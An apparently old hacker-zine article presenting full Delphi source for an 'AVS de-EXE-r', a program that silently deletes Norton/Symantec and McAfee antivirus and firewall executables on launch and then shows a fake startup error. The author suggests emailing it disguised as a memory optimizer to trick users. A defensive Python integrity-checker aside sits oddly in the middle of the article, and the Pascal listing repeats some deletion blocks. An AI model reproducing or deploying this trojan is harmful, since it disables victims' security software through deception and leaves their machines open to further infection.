A Simple but Effective Spanner in Your AVS

by Irving Washington

First off, sorry if anyone's miffed that I wrote this in Object Pascal.

I happen to like Borland's IDEs, and Delphi 7 came free with a computer mag DVD.  I actually like it when the aim is to produce a Win32 app which can easily take the look and feel of all the Win OSes, from the battleship gray of Windows 95 to the Fisher-Price makeover of Windows XP.  So there.  I'm sure you all will take about ten seconds to appreciate the concept and can then write something similar in your own languages.

The basic concept is this:

On execution, the program looks for various EXE files in their standard installation places on the PC running the program.  If they exist, the program deletes them.  For example:

if fileExists ('C:\AVS\AVS.EXE') then
   deleteFile ('C:\AVS\AVS.EXE')
endif.

(Repeat for each file you want to delete)

And that, as they say, is that.

It's easy to get lists of EXE files and their default install locations without shelling out for all the packages.  I got mine by downloading demo versions.  I expect there's an easier way to read the tree for each Anti-Virus Software (AVS) package, but I wanted to get something going quickly to see if the AVS software would pick it up.  It doesn't, as far as I can tell.

Therefore, this could be sent via e-mail systems which check for virii and the like.  The trusting user, seeing the app pass the online scan, would then download and run it on their own system.  The effect is to leave the "shell" of the AVS on the machine, while removing all the working parts.  Kind of like stealing a PC from the inside, leaving the empty case behind.

The deleted files cannot be recovered by going to our old friend the "Recycle Bin".  To the typical user, they will be irretrievable, and the AVS will require a re-installation.

This is obviously not good.  I don't like the idea that I could pay for an AVS designed to protect my PC that could be knocked out by a program which any novice with a bare modicum of programming skills could write, plus the fact that if the person who sent the file was targeting a specific PC/group of PCs, they would be vulnerable to all virii etc., once the initial AVS "de-EXE-r" had been run.

I know that this program isn't a virus.  It's a program that does what it's supposed to.  But it seems hopelessly lame to me that AVS programs aren't able to protect themselves against such a blatant, obvious attack.
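The self-check the paragraph above finds missing can be approximated from outside the product. The sketch below is an added example, not the author's code or any vendor's: it records a SHA-256 baseline of a protected install tree and later reports binaries that are missing or replaced, including the "empty case" state where the directory survives but every baselined binary is gone. The directory and file names are constructed placeholders.

```python
import hashlib
import tempfile
from pathlib import Path

def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()

def build_baseline(root: Path, suffixes=(".exe", ".dll", ".sys")) -> dict:
    """Map relative path -> SHA-256 for every protected binary under root."""
    return {
        str(p.relative_to(root)): sha256_of(p)
        for p in sorted(root.rglob("*"))
        if p.is_file() and p.suffix.lower() in suffixes
    }

def audit(root: Path, baseline: dict) -> dict:
    """Compare the install tree against the baseline taken at install time."""
    report = {"missing": [], "modified": [], "hollow": False}
    for rel, digest in baseline.items():
        target = root / rel
        if not target.is_file():
            report["missing"].append(rel)
        elif sha256_of(target) != digest:
            report["modified"].append(rel)
    # Directory still present but every baselined binary gone: the "empty case".
    report["hollow"] = (root.is_dir() and bool(baseline)
                        and len(report["missing"]) == len(baseline))
    return report

def demo() -> dict:
    """Constructed install tree in a temp dir; all names are placeholders."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "ExampleAV"
        (root / "update").mkdir(parents=True)
        for name in ("scanner.exe", "monitor.exe", "update/updater.exe"):
            (root / name).write_bytes(b"constructed:" + name.encode())
        (root / "readme.txt").write_text("not a protected binary")
        baseline = build_baseline(root)
        (root / "scanner.exe").unlink()                  # binary removed
        (root / "monitor.exe").write_bytes(b"tampered")  # binary replaced
        return audit(root, baseline)

if __name__ == "__main__":
    print(demo())
```

The baseline and the job that runs the audit have to live where the account being monitored cannot write, otherwise they can be removed along with the binaries. Deleting files under C:\Program Files requires write access to those directories, so the check matters most on machines where users run with administrative rights.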

My program, once it has removed the AVS EXE files, displays a little message box saying how the program is incompatible with that version of Windows.  The AVS de-EXE-r can obviously be called, and touted as, anything else.  A useful memory optimizer, for example.  It then shows a window with all the standard menu bar items (disabled) and an error message.  It has an option for reading the details of the "fault."  All cosmetic doohickeys that serve to trick the user into believing that this was simply a program that failed to work, like so many free downloads.

I guess now maybe it's the turn of the guys who get paid to make these AVS things to sort this out.

This took me approximately five minutes to write.  Because I believe in responsible hacking, the only PC I've used it on is my own.  Naturally (here it comes), "What you do with the information contained in this article is up to you.  You know the laws in your own countries, etc.  You know the score.  endpreach()."

Sorry, but I always find those bits quite fun.

O.K., that's enough.  The bones of the program are below.  If you want to use Delphi, I believe you can get free versions at www.borland.com.  If you want to try out my app (on your own PCs only!) then email me.

AVS-de-EXE-r.pas:

//main listing for AVS-De-exe-r as whatnotted in Object Pascal using Delphi 7 

unit Main;
interface

uses
  Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms, Dialogs, StdCtrls, Menus;

type
  TForm1 = class(TForm)
    Button1: TButton;
    Label1: TLabel;
    ListBox1: TListBox;
    MainMenu1: TMainMenu;
    File1: TMenuItem;
    Register1: TMenuItem;
    Search1: TMenuItem;
    View1: TMenuItem;
    ools1: TMenuItem;
    Window1: TMenuItem;
    Help1: TMenuItem;
    Memo1: TMemo;
    Button2: TButton;
    procedure FormCreate(Sender: TObject);
    procedure Button1Click(Sender: TObject);
    procedure Button2Click(Sender: TObject);
  private
    { Private declarations }
  public
    { Public declarations }
  end;

var
  Form1: TForm1;

implementation

{$R *.dfm}

procedure TForm1.FormCreate(Sender: TObject);
begin
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\BackLog.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\BackLog.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\BootWarn.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\BootWarn.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\DefAlert.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\DefAlert.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\n32scanw.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\n32scanw.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navapsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navapw32.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapw32.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\alertsvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\alertsvc.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\navapw32.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navapw32.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\NavUStub.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NavUStub.exe');
    end;
  if fileExists ('C:\Program Files\Navnt\navwnt.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\navwnt.exe');
    end;
   if fileExists ('C:\Program Files\Navnt\NPSCheck.EXE') then
    begin
      deleteFile ('C:\Program Files\Navnt\NPSCheck.EXE');
    end;
    if fileExists ('C:\Program Files\Navnt\npssvc.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\npssvc.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\NSPlugin.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NSPlugin.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\NTaskMgr.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\NTaskMgr.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\nvlaunch.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\nvlaunch.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\POProxy.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\POProxy.exe');
    end;
     if fileExists ('C:\Program Files\Navnt\qconsole.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\qconsole.exe');
    end;
       if fileExists ('C:\Program Files\Navnt\ScnHndlr.exe') then
    begin
      deleteFile ('C:\Program Files\Navnt\ScnHndlr.exe');
    end;
      if fileExists ('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\NDETECT.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\AUPDATE.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LUALL.EXE');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LuComServer.EXE');
    end;
    if fileExists ('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\1.Settings.Default.LiveUpdate');
    end;
     if fileExists ('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE') then
    begin
      deleteFile ('C:\Program Files\Symantec\LiveUpdate\LSETUP.EXE');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gd32.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gdlaunch.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\gdcrypt.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\gdcrypt.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\GuardDog.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\GuardDog.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Internet Security\IView.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Internet Security\IView.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Firewall\cpd.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Firewall\cpd.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\VisualTrace\NeoTrace.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\VisualTrace\NeoTrace.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Shredder\shred32.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Shredder\shred32.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\QuickClean Lite\QClean.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\QuickClean Lite\QClean.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Instant Updater\RuLaunch.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\CMGrdian.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\CMGrdian.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\schedwiz.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Guardian\schedwiz.exe');
    end;
    if fileExists ('C:\Program Files\McAfee\McAfee Shared Components\Central\CLaunch.exe') then
    begin
      deleteFile ('C:\Program Files\McAfee\McAfee Shared Components\Central\CLaunch.exe');
    end;
  showmessage('Could not find dev\null\drivers.dll. Application failed to start.');

end;

procedure TForm1.Button1Click(Sender: TObject);
begin
  Close;
end;

procedure TForm1.Button2Click(Sender: TObject);
begin
  ListBox1.Visible := false;
  Memo1.Visible := true;
end;

end.
